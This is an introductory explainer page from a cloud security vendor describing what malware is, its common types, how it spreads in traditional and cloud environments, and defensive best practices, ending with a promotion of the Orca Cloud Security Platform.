Malware

Malware, short for malicious software, refers to any software intentionally designed to cause damage, steal data, or gain unauthorized access to systems, networks, or users. It includes a broad range of threats such as viruses, worms, ransomware, spyware, Trojans, rootkits, and more. Malware is a key weapon in the arsenal of cybercriminals, state-sponsored actors, and hacktivists, and is frequently used in targeted attacks, large-scale campaigns, and supply chain compromises.

As cloud computing, SaaS, and containerized applications become more prevalent, malware is increasingly being adapted to exploit cloud-native environments in addition to traditional IT systems.

What is malware?

Malware is any piece of code or software that performs harmful actions on a system without the user’s consent. While some malware simply causes disruption or defacement, most modern malware is financially or strategically motivated—aiming to steal credentials, encrypt data for ransom, exfiltrate sensitive information, spy on users, or provide persistent access to attackers.

Malware can be delivered through various vectors including:

• Phishing emails and malicious attachments
• Infected websites or drive-by downloads
• Compromised software packages or container images
• Exploited vulnerabilities in applications or operating systems
• Infected USB drives or removable media
• Malicious insider uploads

Once executed, malware may run silently in the background, escalate privileges, disable defenses, communicate with command-and-control (C2) servers, or spread across networks or cloud environments.

Common types of malware

There are many types of malware, each with specific tactics and intended outcomes. Common variants include:

Ransomware: Encrypts files or entire systems and demands payment—usually in cryptocurrency—for the decryption key. Some variants also exfiltrate data for double extortion.

Trojans: Disguised as legitimate software or documents but install a backdoor or payload that enables remote control or data theft.

Worms: Self-replicating malware that spreads automatically across networks and devices, often without human interaction.

Viruses: Code that attaches to legitimate files and spreads when those files are executed. They can corrupt data, crash systems, or serve as a delivery mechanism for other payloads.

Spyware: Secretly monitors user activity, keystrokes, or browser history to gather data such as passwords, financial information, or intellectual property.

Adware: Displays unwanted ads or redirects users to malicious websites, sometimes also collecting personal data.

Rootkits: Modify low-level system components to hide malware or unauthorized processes, making them extremely difficult to detect and remove.

Fileless malware: Operates in memory and uses trusted tools like PowerShell to avoid detection by traditional antivirus solutions.

Modern malware often combines multiple tactics—for example, ransomware may include worm-like propagation or spyware may be bundled inside a Trojan.

Malware in cloud environments

While traditional malware targets endpoints and on-premises systems, attackers increasingly adapt their tactics to cloud-native and hybrid environments. Malware in the cloud can:

• Infect virtual machines through compromised images, exposed SSH ports, or outdated software
• Target misconfigured object storage buckets (e.g., AWS S3, Azure Blob) to plant or exfiltrate malicious files
• Exploit vulnerable containers and base images in CI/CD pipelines or public registries
• Abuse cloud credentials to deploy or spread malware across cloud services
• Use serverless functions or automation scripts as delivery mechanisms
• Hide in persistent volumes or storage attached to Kubernetes clusters

Because cloud environments often lack traditional endpoint security controls and use ephemeral resources, malware can be harder to detect and may persist unnoticed if not continuously monitored.

How malware spreads

Malware propagation depends on both the environment and attacker objectives. Common propagation methods include:

• Phishing and social engineering to lure users into running malicious files or enabling macros
• Exploiting unpatched vulnerabilities in operating systems, browsers, or applications
• Exploiting default credentials or brute-forcing login pages
• Spreading laterally across networks, shared storage, or cloud accounts
• Hijacking legitimate infrastructure like supply chains or software updates
• Leveraging exposed APIs, misconfigured IAM roles, or shared secrets in cloud platforms

Sophisticated malware may also use encryption, obfuscation, and polymorphism to evade detection.

How to detect and prevent malware

Malware defense requires a combination of preventative controls and detection capabilities. Best practices include:

Keep systems and software updated: Regularly patch operating systems, applications, and container images to reduce exploitable vulnerabilities.

Use defense-in-depth: Layer traditional antivirus or EDR tools with newer cloud-native protections and workload monitoring.

Scan containers and images: Validate base images, third-party packages, and infrastructure as code templates before deployment.

Restrict permissions: Apply the principle of least privilege to users, applications, and services to limit malware’s potential impact.

Isolate workloads: Use network segmentation, namespaces, and runtime controls to prevent lateral movement.

Detect anomalies: Monitor for unusual behavior such as spikes in CPU, unauthorized script execution, outbound traffic to unknown domains, or file system changes.

Educate users: Train employees to recognize phishing attempts and avoid risky behaviors like downloading attachments from unknown sources.

Back up critical systems: Maintain encrypted, offline backups that can be restored in case of ransomware or data destruction.

Malware challenges in detection and response

Despite advances in security tooling, detecting and remediating malware remains challenging:

• Fileless malware and living-off-the-land tactics evade signature-based defenses
• Malware may reside in workloads that lack EDR or antivirus coverage
• Attackers often use legitimate credentials or automation tools to blend in
• In cloud environments, rapid infrastructure changes make it difficult to track persistence
• Traditional tools may not inspect object storage, containers, or serverless functions for malware

Security teams must adopt a threat-informed approach—correlating behavioral data, cloud context, and asset relationships to detect and stop malware effectively.

How Orca Security helps

The Orca Cloud Security Platform delivers comprehensive malware detection and protection across AWS, Azure, Google Cloud, Oracle Cloud, Alibaba Cloud, and Kubernetes—without requiring agents.

Orca helps security teams:

• Detect, prioritize, and remediate malware in cloud workloads, such as storage buckets and virtual machines
• Leverage multiple detection techniques, including signature-based scanning, heuristic file analysis, dynamic scanning, and genetic signature detection and YARA rules 
• Analyze malware risks holistically to identify critical attack paths and enhance Cloud Detection and Response (CDR)
• Ensure continuous multi-cloud compliance with regulations and industry standards that mandate malware detection

Orca gives organizations full-stack, context-rich visibility into malware risks—allowing them to act quickly and stop threats before they escalate.